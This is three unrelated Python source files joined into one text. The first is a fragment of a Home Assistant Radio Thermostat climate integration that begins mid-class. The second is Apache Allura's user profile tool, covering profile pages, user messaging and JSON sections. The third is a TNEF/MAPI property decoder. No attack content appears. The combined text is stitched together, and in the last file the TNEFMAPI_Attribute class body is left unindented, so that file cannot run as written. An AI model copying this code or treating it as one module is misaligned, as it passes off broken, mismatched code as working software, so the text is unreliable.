
    @property
    def hvac_modes(self):
        """Return the operation modes list."""
        return OPERATION_LIST

    @property
    def hvac_action(self):
        """Return the current running hvac operation if supported."""
        if self.hvac_mode == HVAC_MODE_OFF:
            return None
        return self._tstate

    @property
    def target_temperature(self):
        """Return the temperature we try to reach."""
        return self._target_temperature

    @property
    def preset_mode(self):
        """Return the current preset mode, e.g., home, away, temp."""
        if self._program_mode == 0:
            return PRESET_HOME
        if self._program_mode == 1:
            return PRESET_ALTERNATE
        if self._program_mode == 2:
            return PRESET_AWAY
        if self._program_mode == 3:
            return PRESET_HOLIDAY

    @property
    def preset_modes(self):
        """Return a list of available preset modes."""
        return PRESET_MODES

    def update(self):
        """Update and validate the data from the thermostat."""
        # Radio thermostats are very slow, and sometimes don't respond
        # very quickly.  So we need to keep the number of calls to them
        # to a bare minimum or we'll hit the Home Assistant 10 sec warning.  We
        # have to make one call to /tstat to get temps but we'll try and
        # keep the other calls to a minimum.  Even with this, these
        # thermostats tend to time out sometimes when they're actively
        # heating or cooling.
        try:
            # First time - get the name from the thermostat.  This is
            # normally set in the radio thermostat web app.
            if self._name is None:
                self._name = self.device.name["raw"]
            # Request the current state from the thermostat.
            data = self.device.tstat["raw"]
            if self._is_model_ct80:
                humiditydata = self.device.humidity["raw"]
        except radiotherm.validate.RadiothermTstatError:
            _LOGGER.warning(
                "%s (%s) was busy (invalid value returned)",
                self._name,
                self.device.host,
            )
        except timeout:
            _LOGGER.warning(
                "Timeout waiting for response from %s (%s)",
                self._name,
                self.device.host,
            )
        else:
            # only reached when the device responded successfully
            if self._is_model_ct80:
                self._current_humidity = humiditydata
                self._program_mode = data["program_mode"]
                self._preset_mode = CODE_TO_PRESET_MODE[data["program_mode"]]
            # Map thermostat values into various STATE_ flags.
            self._current_temperature = data["temp"]
            self._fmode = CODE_TO_FAN_MODE[data["fmode"]]
            self._fstate = CODE_TO_FAN_STATE[data["fstate"]]
            self._tmode = CODE_TO_TEMP_MODE[data["tmode"]]
            self._tstate = CODE_TO_TEMP_STATE[data["tstate"]]
            self._hold_set = CODE_TO_HOLD_STATE[data["hold"]]
            self._current_operation = self._tmode
            if self._tmode == HVAC_MODE_COOL:
                self._target_temperature = data["t_cool"]
            elif self._tmode == HVAC_MODE_HEAT:
                self._target_temperature = data["t_heat"]
            elif self._tmode == HVAC_MODE_AUTO:
                # This doesn't really work - tstate is only set if the HVAC is
                # active.  If it's idle, we don't know what to do with the target
                # temperature.
                if self._tstate == CURRENT_HVAC_COOL:
                    self._target_temperature = data["t_cool"]
                elif self._tstate == CURRENT_HVAC_HEAT:
                    self._target_temperature = data["t_heat"]
            else:
                self._current_operation = HVAC_MODE_OFF

    def set_temperature(self, **kwargs):
        """Set new target temperature."""
        temperature = kwargs.get(ATTR_TEMPERATURE)
        if temperature is None:
            return
        temperature = round_temp(temperature)
        if self._current_operation == HVAC_MODE_COOL:
            self.device.t_cool = temperature
        elif self._current_operation == HVAC_MODE_HEAT:
            self.device.t_heat = temperature
        elif self._current_operation == HVAC_MODE_AUTO:
            if self._tstate == CURRENT_HVAC_COOL:
                self.device.t_cool = temperature
            elif self._tstate == CURRENT_HVAC_HEAT:
                self.device.t_heat = temperature
        # Only change the hold if requested or if hold mode was turned
        # on and we haven't set it yet.
        if kwargs.get("hold_changed", False) or not self._hold_set:
            if self._hold_temp:
                self.device.hold = 1
                self._hold_set = True
            else:
                self.device.hold = 0

    def set_time(self):
        """Set device time."""
        # Calling this clears any local temperature override and
        # reverts to the scheduled temperature.
        now = dt_util.now()
        self.device.time = {
            "day": now.weekday(),
            "hour": now.hour,
            "minute": now.minute,
        }

    def set_hvac_mode(self, hvac_mode):
        """Set operation mode (auto, cool, heat, off)."""
        if hvac_mode in (HVAC_MODE_OFF, HVAC_MODE_AUTO):
            self.device.tmode = TEMP_MODE_TO_CODE[hvac_mode]
        # Setting t_cool or t_heat automatically changes tmode.
        elif hvac_mode == HVAC_MODE_COOL:
            self.device.t_cool = self._target_temperature
        elif hvac_mode == HVAC_MODE_HEAT:
            self.device.t_heat = self._target_temperature

    def set_preset_mode(self, preset_mode):
        """Set Preset mode (Home, Alternate, Away, Holiday)."""
        if preset_mode in (PRESET_MODES):
            self.device.program_mode = PRESET_MODE_TO_CODE[preset_mode]
        else:
            _LOGGER.error(
                "Preset_mode %s not in PRESET_MODES",
                preset_mode,
            )
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import pkg_resources
from datetime import datetime
import six
from formencode import validators
from tg import request
from tg import tmpl_context as c, app_globals as g
from pytz import timezone
from tg import expose, redirect, validate, flash
from tg.decorators import without_trailing_slash
from decorator import decorator
from webob import exc
from allura import version
from allura.app import Application, SitemapEntry
from allura.controllers import BaseController
from allura.controllers.feed import FeedArgs, FeedController
from allura.controllers.rest import AppRestControllerMixin
from allura.lib import helpers as h
from allura.lib.decorators import require_post
from allura.lib.plugin import AuthenticationProvider
from allura.lib.security import require_access
from allura.lib.widgets.user_profile import SendMessageForm, SectionsUtil, SectionBase, ProjectsSectionBase
from allura.model import User, ACE, ProjectRole
# Module-level logger, named after this module per convention.
log = logging.getLogger(__name__)
class F:
    # Container for shared widget instances; the form is built once at
    # import time and reused by the controllers below (c.form = F.send_message).
    send_message = SendMessageForm()
class UserProfileApp(Application):
    """
    This is the Profile tool, which is automatically installed as
    the default (first) tool on any user project.
    """
    __version__ = version.__version__
    tool_label = 'Profile'
    # 0 means users cannot install additional instances of this tool.
    max_instances = 0
    has_notifications = False
    # Tool icon resources, keyed by pixel size.
    icons = {
        24: 'images/home_24.png',
        32: 'images/home_32.png',
        48: 'images/home_48.png'
    }
    def __init__(self, user, config):
        """Wire up the web controller, REST controller, and template dir."""
        Application.__init__(self, user, config)
        self.root = UserProfileController()
        self.templates = pkg_resources.resource_filename(
            'allura.ext.user_profile', 'templates')
        self.api_root = UserProfileRestController()
    @property
    @h.exceptionless([], log)
    def sitemap(self):
        # exceptionless: any error raised while building the sitemap is
        # logged and an empty list is returned instead of propagating.
        return [SitemapEntry('Profile', '.')]
    def admin_menu(self):
        # The profile tool exposes no admin menu entries.
        return []
    def main_menu(self):
        return [SitemapEntry('Profile', '.')]
    def is_visible_to(self, user):
        # we don't work with user subprojects
        return c.project.is_root
    def install(self, project):
        """Grant this tool's permissions to the current user's project role."""
        pr = ProjectRole.by_user(c.user)
        if pr:
            self.config.acl = [
                ACE.allow(pr._id, perm)
                for perm in self.permissions]
    def uninstall(self, project): # pragma no cover
        # Nothing to clean up: the tool keeps no state of its own.
        pass
    @property
    def profile_sections(self):
        """
        Loads and caches user profile sections from the entry-point
        group ``[allura.user_profile.sections]``.
        Profile sections are loaded unless disabled (see
        `allura.lib.helpers.iter_entry_points`) and are sorted according
        to the `user_profile_sections.order` config value.
        The config should contain a comma-separated list of entry point names
        in the order that they should appear in the profile. Unknown or
        disabled sections are ignored, and available sections that are not
        specified in the order come after all explicitly ordered sections,
        sorted randomly.
        """
        # Cached on the class itself, so sections are loaded at most
        # once per process regardless of how many app instances exist.
        if hasattr(UserProfileApp, '_sections'):
            return UserProfileApp._sections
        UserProfileApp._sections = SectionsUtil.load_sections('user_profile')
        return UserProfileApp._sections
class UserProfileController(BaseController, FeedController):
    """Web controller for a user's profile pages on their user project."""
    def _check_security(self):
        # All profile views require read access on the user project.
        require_access(c.project, 'read')
    def _check_can_message(self, from_user, to_user):
        """Validate that from_user may message to_user.

        On any failure, flashes an explanatory message and redirects back
        to the referrer (the redirect aborts the request, so callers may
        assume messaging is allowed if this returns).
        """
        if from_user.is_anonymous():
            flash('You must be logged in to send user messages.', 'info')
            redirect(six.ensure_text(request.referer or '/'))
        if not (from_user and from_user.get_pref('email_address')):
            flash('In order to send messages, you must have an email address '
                  'associated with your account.', 'info')
            redirect(six.ensure_text(request.referer or '/'))
        if not (to_user and to_user.get_pref('email_address')):
            flash('This user can not receive messages because they do not have '
                  'an email address associated with their account.', 'info')
            redirect(six.ensure_text(request.referer or '/'))
        if to_user.get_pref('disable_user_messages'):
            flash('This user has disabled direct email messages', 'info')
            redirect(six.ensure_text(request.referer or '/'))
    @expose('jinja:allura.ext.user_profile:templates/user_index.html')
    def index(self, **kw):
        """Render the main profile page with all configured sections."""
        user = c.project.user_project_of
        if not user:
            raise exc.HTTPNotFound()
        provider = AuthenticationProvider.get(request)
        sections = [section(user, c.project)
                    for section in c.app.profile_sections]
        # Ask crawlers not to index profiles that show no projects and
        # no activity timeline (noindex stays True only if all sections
        # are empty of both).
        noindex = True
        for s in sections:
            s.setup_context()
            if s.context.get('projects') or s.context.get('timeline'):
                noindex = False
        return dict(
            user=user,
            reg_date=provider.user_registration_date(user),
            sections=sections,
            noindex=noindex,
        )
    def get_feed(self, project, app, user):
        """Return a :class:`allura.controllers.feed.FeedArgs` object describing
        the xml feed for this controller.
        Overrides :meth:`allura.controllers.feed.FeedController.get_feed`.
        """
        # NOTE: the `user` argument is ignored; the feed's author is
        # always the owner of this user project.
        user = project.user_project_of
        return FeedArgs(
            {'author_link': user.url()},
            'Recent posts by %s' % user.display_name,
            project.url())
    @expose('jinja:allura.ext.user_profile:templates/send_message.html')
    def send_message(self):
        """Render form for sending a message to another user.
        """
        self._check_can_message(c.user, c.project.user_project_of)
        # expire_time is shown when the sender is rate-limited; None
        # means they may send immediately.
        delay = c.user.time_to_next_user_message()
        expire_time = str(delay) if delay else None
        c.form = F.send_message
        if c.user.get_pref('message_reply_real_address'):
            c.form.fields.reply_to_real_address.attrs = {'checked': 'checked'}
        return dict(user=c.project.user_project_of, expire_time=expire_time)
    @require_post()
    @expose()
    @validate(dict(subject=validators.NotEmpty,
                   message=validators.NotEmpty))
    def send_user_message(self, subject='', message='', cc=None, reply_to_real_address=None):
        """Handle POST for sending a message to another user.
        """
        self._check_can_message(c.user, c.project.user_project_of)
        # The cc checkbox means "CC me": replace the flag with the
        # sender's own email address.
        if cc:
            cc = c.user.get_pref('email_address')
        if c.user.can_send_user_message():
            # Persist the reply-to choice as a preference for next time.
            if reply_to_real_address:
                c.user.set_pref('message_reply_real_address', True)
            else:
                c.user.set_pref('message_reply_real_address', False)
            c.user.send_user_message(
                c.project.user_project_of, subject, message, cc, reply_to_real_address, c.user.preferences.email_address)
            flash("Message sent.")
        else:
            flash("You can't send more than %i messages per %i seconds" % (
                g.user_message_max_messages,
                g.user_message_time_interval), 'error')
        return redirect(c.project.user_project_of.url())
    @without_trailing_slash
    @expose('jinja:allura.ext.user_profile:templates/user_card.html')
    def user_card(self):
        """Render the small profile "card" (name, location, website)."""
        u = c.project.user_project_of
        locationData = u.get_pref('localization')
        webpages = u.get_pref('webpages')
        location = ''
        website = ''
        # Build "City, Country", or whichever single part is available.
        if locationData.city and locationData.country:
            location = locationData.city + ', ' + locationData.country
        elif locationData.country and not locationData.city:
            location = locationData.country
        elif locationData.city and not locationData.country:
            location = locationData.city
        # Only the first listed webpage is shown on the card.
        if len(webpages) > 0:
            website = webpages[0]
        return dict(
            user=u,
            location=location,
            website=website)
class UserProfileRestController(AppRestControllerMixin):
    @expose('json:')
    def index(self, **kw):
        """Return the profile as JSON by merging each section's __json__.

        404s if this project is not a user project.
        """
        user = c.project.user_project_of
        if not user:
            raise exc.HTTPNotFound()
        sections = [cls(user, c.project) for cls in c.app.profile_sections]
        # Merge the per-section dicts; sections without __json__ are
        # view-only and contribute nothing to the API response.
        result = {}
        for section in sections:
            if hasattr(section, '__json__'):
                result.update(section.__json__())
        return result
class ProfileSectionBase(SectionBase):
    """Base class for sections displayed on the Profile tool.

    .. py:attribute:: template

        Resource string locating the section's template, e.g.::

            template = "allura.ext.user_profile:templates/projects.html"

    Concrete sections must be registered via an entry point in the
    group ``[allura.user_profile.sections]``.
    """
    def __init__(self, user, project):
        """Store the profiled `user` (via SectionBase) and their user
        `project` as attributes of the same name."""
        super().__init__(user)
        self.project = project
class PersonalDataSection(ProfileSectionBase):
    """Profile section showing the user's personal data preferences."""
    template = 'allura.ext.user_profile:templates/sections/personal-data.html'
    def prepare_context(self, context):
        """Replace the stored timezone name with its current abbreviation
        (e.g. 'EST'/'EDT'), leaving a falsy pref value untouched."""
        tz_name = self.user.get_pref('timezone')
        context['timezone'] = tz_name
        if tz_name:
            context['timezone'] = timezone(tz_name).tzname(datetime.utcnow())
        return context
    def __json__(self):
        """JSON-serializable dict of the user's personal data."""
        pref = self.user.get_pref
        provider = AuthenticationProvider.get(request)
        # _deinstrument() strips the ORM wrappers so the raw values
        # can be serialized.
        return {
            'username': self.user.username,
            'name': self.user.display_name,
            'joined': provider.user_registration_date(self.user),
            'localization': pref('localization')._deinstrument(),
            'sex': pref('sex'),
            'telnumbers': pref('telnumbers')._deinstrument(),
            'skypeaccount': pref('skypeaccount'),
            'webpages': pref('webpages')._deinstrument(),
            'availability': pref('availability')._deinstrument(),
        }
class ProjectsSection(ProfileSectionBase, ProjectsSectionBase):
    # Combines the profile-section plumbing with the shared projects
    # listing from ProjectsSectionBase; only the template is specific here.
    template = 'allura.ext.user_profile:templates/sections/projects.html'
class SkillsSection(ProfileSectionBase):
    """Profile section listing the user's declared skills."""
    template = 'allura.ext.user_profile:templates/sections/skills.html'
    def __json__(self):
        """Expose the user's skills for the JSON API."""
        return {'skills': self.user.get_skills()}
class ToolsSection(ProfileSectionBase):
    # Purely presentational section (no __json__): renders the user's
    # installed tools from this template.
    template = 'allura.ext.user_profile:templates/sections/tools.html'
class SocialSection(ProfileSectionBase):
    """Profile section listing the user's social network accounts."""
    template = 'allura.ext.user_profile:templates/sections/social.html'
    def __json__(self):
        """Expose the user's social-network prefs for the JSON API."""
        networks = self.user.get_pref('socialnetworks')._deinstrument()
        return {'socialnetworks': networks}
|
|
"MAPI attribute definitions"
import logging
from util import bytes_to_int
logging.basicConfig()
logger = logging.getLogger("mapi-decode")
# MAPI property-type codes: the "type" half of a MAPI property tag,
# selecting how the attribute's value bytes are encoded in the stream.
SZMAPI_UNSPECIFIED = 0x0000 # MAPI Unspecified
SZMAPI_NULL = 0x0001 # MAPI null property
SZMAPI_SHORT = 0x0002 # MAPI short (signed 16 bits)
SZMAPI_INT = 0x0003 # MAPI integer (signed 32 bits)
SZMAPI_FLOAT = 0x0004 # MAPI float (4 bytes)
SZMAPI_DOUBLE = 0x0005 # MAPI double
SZMAPI_CURRENCY = 0x0006 # MAPI currency (64 bits)
SZMAPI_APPTIME = 0x0007 # MAPI application time
SZMAPI_ERROR = 0x000a # MAPI error (32 bits)
SZMAPI_BOOLEAN = 0x000b # MAPI boolean (16 bits)
SZMAPI_OBJECT = 0x000d # MAPI embedded object
SZMAPI_INT8BYTE = 0x0014 # MAPI 8 byte signed int
SZMAPI_STRING = 0x001e # MAPI string
SZMAPI_UNICODE_STRING = 0x001f # MAPI unicode-string (null terminated)
#SZMAPI_PT_SYSTIME = 0x001e # MAPI time (after 2038/01/17 22:14:07 or before 1970/01/01 00:00:00)
SZMAPI_SYSTIME = 0x0040 # MAPI time (64 bits)
SZMAPI_CLSID = 0x0048 # MAPI OLE GUID
SZMAPI_BINARY = 0x0102 # MAPI binary
SZMAPI_BEATS_THE_HELL_OUTTA_ME = 0x0033 # undocumented type observed in the wild
def decode_mapi(data):
    """Decode a block of encapsulated MAPI properties.

    data: bytes of a MAPI property stream -- a 4-byte little-endian
    property count followed by that many typed attribute records.

    Returns a list of TNEFMAPI_Attribute objects. Decoding is
    best-effort: if the stream is truncated or malformed, the exception
    is logged at debug level and the attributes decoded so far are
    returned.
    """
    dataLen = len(data)
    attrs = []
    offset = 0
    num_properties = bytes_to_int(data[offset:offset+4]); offset += 4
    try:
        for i in range(num_properties):
            if offset >= dataLen:
                # The header declared more properties than the buffer holds.
                logger.warning("Skipping property '%i'" % i)
                continue
            attr_type = bytes_to_int(data[offset:offset+2]); offset += 2
            attr_name = bytes_to_int(data[offset:offset+2]); offset += 2
            guid = ''
            if attr_name >= 0x8000:
                # Named property: a 16-byte GUID then a "kind" selector.
                guid = '%32.32x' % bytes_to_int(data[offset:offset+16]); offset += 16
                kind = bytes_to_int(data[offset:offset+4]); offset += 4
                if kind == 0:
                    # Numeric name: skip its 4-byte id.
                    offset += 4
                else:
                    # String name: skip its length-prefixed text,
                    # padded up to a 4-byte boundary.
                    iidLen = bytes_to_int(data[offset:offset+4]); offset += 4
                    q, r = divmod(iidLen, 4)
                    if r != 0:
                        iidLen += (4-r)
                    offset += iidLen
            attr_data = None
            if attr_type == SZMAPI_SHORT:
                attr_data = data[offset:offset+2]; offset += 2
            elif attr_type in (SZMAPI_INT, SZMAPI_FLOAT, SZMAPI_ERROR, SZMAPI_BOOLEAN):
                attr_data = data[offset:offset+4]; offset += 4
            elif attr_type in (SZMAPI_DOUBLE, SZMAPI_APPTIME, SZMAPI_CURRENCY, SZMAPI_INT8BYTE, SZMAPI_SYSTIME):
                attr_data = data[offset:offset+8]; offset += 8
            elif attr_type == SZMAPI_CLSID:
                attr_data = data[offset:offset+16]; offset += 16
            elif attr_type in (SZMAPI_STRING, SZMAPI_UNICODE_STRING, SZMAPI_OBJECT, SZMAPI_BINARY, SZMAPI_UNSPECIFIED):
                # Variable-length, possibly multi-valued types: a count,
                # then length-prefixed values padded to 4-byte boundaries.
                num_vals = bytes_to_int(data[offset:offset+4]); offset += 4
                attr_data = []
                for j in range(num_vals):
                    # BUGFIX: the previous "inlined" read did
                    # ord(offset[0]) + ... -- indexing the *integer*
                    # offset instead of the data buffer, which always
                    # raised TypeError and silently truncated the decode
                    # via the broad except below.
                    length = bytes_to_int(data[offset:offset+4])
                    offset += 4
                    q, r = divmod(length, 4)
                    if r != 0:
                        length += (4-r)
                    attr_data.append(data[offset:offset+length]); offset += length
            else:
                logger.debug("## Unknown MAPI type 0x%4.4x" % attr_type)
                logger.debug("Attribute type: 0x%4.4x" % attr_type)
                logger.debug("Attribute name: 0x%4.4x" % attr_name)
                break
            attr = TNEFMAPI_Attribute(attr_type, attr_name, attr_data, guid)
            attrs.append(attr)
    except Exception as e:
        # Best-effort decoding: log and return what was parsed so far.
        logger.debug('decode_mapi Exception %s' % e)
    return attrs
class TNEFMAPI_Attribute(object):
"represents a mapi attribute"
MAPI_ACKNOWLEDGEMENT_MODE = 0x0001
MAPI_ALTERNATE_RECIPIENT_ALLOWED = 0x0002
MAPI_AUTHORIZING_USERS = 0x0003
MAPI_AUTO_FORWARD_COMMENT = 0x0004
MAPI_AUTO_FORWARDED = 0x0005
MAPI_CONTENT_CONFIDENTIALITY_ALGORITHM_ID = 0x0006
MAPI_CONTENT_CORRELATOR = 0x0007
MAPI_CONTENT_IDENTIFIER = 0x0008
MAPI_CONTENT_LENGTH = 0x0009
MAPI_CONTENT_RETURN_REQUESTED = 0x000A
MAPI_CONVERSATION_KEY = 0x000B
MAPI_CONVERSION_EITS = 0x000C
MAPI_CONVERSION_WITH_LOSS_PROHIBITED = 0x000D
MAPI_CONVERTED_EITS = 0x000E
MAPI_DEFERRED_DELIVERY_TIME = 0x000F
MAPI_DELIVER_TIME = 0x0010
MAPI_DISCARD_REASON = 0x0011
MAPI_DISCLOSURE_OF_RECIPIENTS = 0x0012
MAPI_DL_EXPANSION_HISTORY = 0x0013
MAPI_DL_EXPANSION_PROHIBITED = 0x0014
MAPI_EXPIRY_TIME = 0x0015
MAPI_IMPLICIT_CONVERSION_PROHIBITED = 0x0016
MAPI_IMPORTANCE = 0x0017
MAPI_IPM_ID = 0x0018
MAPI_LATEST_DELIVERY_TIME = 0x0019
MAPI_MESSAGE_CLASS = 0x001A
MAPI_MESSAGE_DELIVERY_ID = 0x001B
MAPI_MESSAGE_SECURITY_LABEL = 0x001E
MAPI_OBSOLETED_IPMS = 0x001F
MAPI_ORIGINALLY_INTENDED_RECIPIENT_NAME = 0x0020
MAPI_ORIGINAL_EITS = 0x0021
MAPI_ORIGINATOR_CERTIFICATE = 0x0022
MAPI_ORIGINATOR_DELIVERY_REPORT_REQUESTED = 0x0023
MAPI_ORIGINATOR_RETURN_ADDRESS = 0x0024
MAPI_PARENT_KEY = 0x0025
MAPI_PRIORITY = 0x0026
MAPI_ORIGIN_CHECK = 0x0027
MAPI_PROOF_OF_SUBMISSION_REQUESTED = 0x0028
MAPI_READ_RECEIPT_REQUESTED = 0x0029
MAPI_RECEIPT_TIME = 0x002A
MAPI_RECIPIENT_REASSIGNMENT_PROHIBITED = 0x002B
MAPI_REDIRECTION_HISTORY = 0x002C
MAPI_RELATED_IPMS = 0x002D
MAPI_ORIGINAL_SENSITIVITY = 0x002E
MAPI_LANGUAGES = 0x002F
MAPI_REPLY_TIME = 0x0030
MAPI_REPORT_TAG = 0x0031
MAPI_REPORT_TIME = 0x0032
MAPI_RETURNED_IPM = 0x0033
MAPI_SECURITY = 0x0034
MAPI_INCOMPLETE_COPY = 0x0035
MAPI_SENSITIVITY = 0x0036
MAPI_SUBJECT = 0x0037
MAPI_SUBJECT_IPM = 0x0038
MAPI_CLIENT_SUBMIT_TIME = 0x0039
MAPI_REPORT_NAME = 0x003A
MAPI_SENT_REPRESENTING_SEARCH_KEY = 0x003B
MAPI_X400_CONTENT_TYPE = 0x003C
MAPI_SUBJECT_PREFIX = 0x003D
MAPI_NON_RECEIPT_REASON = 0x003E
MAPI_RECEIVED_BY_ENTRYID = 0x003F
MAPI_RECEIVED_BY_NAME = 0x0040
MAPI_SENT_REPRESENTING_ENTRYID = 0x0041
MAPI_SENT_REPRESENTING_NAME = 0x0042
MAPI_RCVD_REPRESENTING_ENTRYID = 0x0043
MAPI_RCVD_REPRESENTING_NAME = 0x0044
MAPI_REPORT_ENTRYID = 0x0045
MAPI_READ_RECEIPT_ENTRYID = 0x0046
MAPI_MESSAGE_SUBMISSION_ID = 0x0047
MAPI_PROVIDER_SUBMIT_TIME = 0x0048
MAPI_ORIGINAL_SUBJECT = 0x0049
MAPI_DISC_VAL = 0x004A
MAPI_ORIG_MESSAGE_CLASS = 0x004B
MAPI_ORIGINAL_AUTHOR_ENTRYID = 0x004C
MAPI_ORIGINAL_AUTHOR_NAME = 0x004D
MAPI_ORIGINAL_SUBMIT_TIME = 0x004E
MAPI_REPLY_RECIPIENT_ENTRIES = 0x004F
MAPI_REPLY_RECIPIENT_NAMES = 0x0050
MAPI_RECEIVED_BY_SEARCH_KEY = 0x0051
MAPI_RCVD_REPRESENTING_SEARCH_KEY = 0x0052
MAPI_READ_RECEIPT_SEARCH_KEY = 0x0053
MAPI_REPORT_SEARCH_KEY = 0x0054
MAPI_ORIGINAL_DELIVERY_TIME = 0x0055
MAPI_ORIGINAL_AUTHOR_SEARCH_KEY = 0x0056
MAPI_MESSAGE_TO_ME = 0x0057
MAPI_MESSAGE_CC_ME = 0x0058
MAPI_MESSAGE_RECIP_ME = 0x0059
MAPI_ORIGINAL_SENDER_NAME = 0x005A
MAPI_ORIGINAL_SENDER_ENTRYID = 0x005B
MAPI_ORIGINAL_SENDER_SEARCH_KEY = 0x005C
MAPI_ORIGINAL_SENT_REPRESENTING_NAME = 0x005D
MAPI_ORIGINAL_SENT_REPRESENTING_ENTRYID = 0x005E
MAPI_ORIGINAL_SENT_REPRESENTING_SEARCH_KEY = 0x005F
MAPI_START_DATE = 0x0060
MAPI_END_DATE = 0x0061
MAPI_OWNER_APPT_ID = 0x0062
MAPI_RESPONSE_REQUESTED = 0x0063
MAPI_SENT_REPRESENTING_ADDRTYPE = 0x0064
MAPI_SENT_REPRESENTING_EMAIL_ADDRESS = 0x0065
MAPI_ORIGINAL_SENDER_ADDRTYPE = 0x0066
MAPI_ORIGINAL_SENDER_EMAIL_ADDRESS = 0x0067
MAPI_ORIGINAL_SENT_REPRESENTING_ADDRTYPE = 0x0068
MAPI_ORIGINAL_SENT_REPRESENTING_EMAIL_ADDRESS = 0x0069
MAPI_CONVERSATION_TOPIC = 0x0070
MAPI_CONVERSATION_INDEX = 0x0071
MAPI_ORIGINAL_DISPLAY_BCC = 0x0072
MAPI_ORIGINAL_DISPLAY_CC = 0x0073
MAPI_ORIGINAL_DISPLAY_TO = 0x0074
MAPI_RECEIVED_BY_ADDRTYPE = 0x0075
MAPI_RECEIVED_BY_EMAIL_ADDRESS = 0x0076
MAPI_RCVD_REPRESENTING_ADDRTYPE = 0x0077
MAPI_RCVD_REPRESENTING_EMAIL_ADDRESS = 0x0078
MAPI_ORIGINAL_AUTHOR_ADDRTYPE = 0x0079
MAPI_ORIGINAL_AUTHOR_EMAIL_ADDRESS = 0x007A
MAPI_ORIGINALLY_INTENDED_RECIP_ADDRTYPE = 0x007B
MAPI_ORIGINALLY_INTENDED_RECIP_EMAIL_ADDRESS = 0x007C
MAPI_TRANSPORT_MESSAGE_HEADERS = 0x007D
MAPI_DELEGATION = 0x007E
MAPI_TNEF_CORRELATION_KEY = 0x007F
MAPI_BODY = 0x1000
MAPI_BODY_HTML = 0x1013
MAPI_REPORT_TEXT = 0x1001
MAPI_ORIGINATOR_AND_DL_EXPANSION_HISTORY = 0x1002
MAPI_REPORTING_DL_NAME = 0x1003
MAPI_REPORTING_MTA_CERTIFICATE = 0x1004
MAPI_RTF_SYNC_BODY_CRC = 0x1006
MAPI_RTF_SYNC_BODY_COUNT = 0x1007
MAPI_RTF_SYNC_BODY_TAG = 0x1008
MAPI_RTF_COMPRESSED = 0x1009
MAPI_RTF_SYNC_PREFIX_COUNT = 0x1010
MAPI_RTF_SYNC_TRAILING_COUNT = 0x1011
MAPI_ORIGINALLY_INTENDED_RECIP_ENTRYID = 0x1012
MAPI_CONTENT_INTEGRITY_CHECK = 0x0C00
MAPI_EXPLICIT_CONVERSION = 0x0C01
MAPI_IPM_RETURN_REQUESTED = 0x0C02
MAPI_MESSAGE_TOKEN = 0x0C03
MAPI_NDR_REASON_CODE = 0x0C04
MAPI_NDR_DIAG_CODE = 0x0C05
MAPI_NON_RECEIPT_NOTIFICATION_REQUESTED = 0x0C06
MAPI_DELIVERY_POINT = 0x0C07
MAPI_ORIGINATOR_NON_DELIVERY_REPORT_REQUESTED = 0x0C08
MAPI_ORIGINATOR_REQUESTED_ALTERNATE_RECIPIENT = 0x0C09
MAPI_PHYSICAL_DELIVERY_BUREAU_FAX_DELIVERY = 0x0C0A
MAPI_PHYSICAL_DELIVERY_MODE = 0x0C0B
MAPI_PHYSICAL_DELIVERY_REPORT_REQUEST = 0x0C0C
MAPI_PHYSICAL_FORWARDING_ADDRESS = 0x0C0D
MAPI_PHYSICAL_FORWARDING_ADDRESS_REQUESTED = 0x0C0E
MAPI_PHYSICAL_FORWARDING_PROHIBITED = 0x0C0F
MAPI_PHYSICAL_RENDITION_ATTRIBUTES = 0x0C10
MAPI_PROOF_OF_DELIVERY = 0x0C11
MAPI_PROOF_OF_DELIVERY_REQUESTED = 0x0C12
MAPI_RECIPIENT_CERTIFICATE = 0x0C13
MAPI_RECIPIENT_NUMBER_FOR_ADVICE = 0x0C14
MAPI_RECIPIENT_TYPE = 0x0C15
MAPI_REGISTERED_MAIL_TYPE = 0x0C16
MAPI_REPLY_REQUESTED = 0x0C17
MAPI_REQUESTED_DELIVERY_METHOD = 0x0C18
MAPI_SENDER_ENTRYID = 0x0C19
MAPI_SENDER_NAME = 0x0C1A
MAPI_SUPPLEMENTARY_INFO = 0x0C1B
MAPI_TYPE_OF_MTS_USER = 0x0C1C
MAPI_SENDER_SEARCH_KEY = 0x0C1D
MAPI_SENDER_ADDRTYPE = 0x0C1E
MAPI_SENDER_EMAIL_ADDRESS = 0x0C1F
MAPI_CURRENT_VERSION = 0x0E00
MAPI_DELETE_AFTER_SUBMIT = 0x0E01
MAPI_DISPLAY_BCC = 0x0E02
MAPI_DISPLAY_CC = 0x0E03
MAPI_DISPLAY_TO = 0x0E04
MAPI_PARENT_DISPLAY = 0x0E05
MAPI_MESSAGE_DELIVERY_TIME = 0x0E06
MAPI_MESSAGE_FLAGS = 0x0E07
MAPI_MESSAGE_SIZE = 0x0E08
MAPI_PARENT_ENTRYID = 0x0E09
MAPI_SENTMAIL_ENTRYID = 0x0E0A
MAPI_CORRELATE = 0x0E0C
MAPI_CORRELATE_MTSID = 0x0E0D
MAPI_DISCRETE_VALUES = 0x0E0E
MAPI_RESPONSIBILITY = 0x0E0F
MAPI_SPOOLER_STATUS = 0x0E10
MAPI_TRANSPORT_STATUS = 0x0E11
MAPI_MESSAGE_RECIPIENTS = 0x0E12
MAPI_MESSAGE_ATTACHMENTS = 0x0E13
MAPI_SUBMIT_FLAGS = 0x0E14
MAPI_RECIPIENT_STATUS = 0x0E15
MAPI_TRANSPORT_KEY = 0x0E16
MAPI_MSG_STATUS = 0x0E17
MAPI_MESSAGE_DOWNLOAD_TIME = 0x0E18
MAPI_CREATION_VERSION = 0x0E19
MAPI_MODIFY_VERSION = 0x0E1A
MAPI_HASATTACH = 0x0E1B
MAPI_BODY_CRC = 0x0E1C
MAPI_NORMALIZED_SUBJECT = 0x0E1D
MAPI_RTF_IN_SYNC = 0x0E1F
MAPI_ATTACH_SIZE = 0x0E20
MAPI_ATTACH_NUM = 0x0E21
MAPI_PREPROCESS = 0x0E22
MAPI_ORIGINATING_MTA_CERTIFICATE = 0x0E25
MAPI_PROOF_OF_SUBMISSION = 0x0E26
MAPI_ENTRYID = 0x0FFF
MAPI_OBJECT_TYPE = 0x0FFE
MAPI_ICON = 0x0FFD
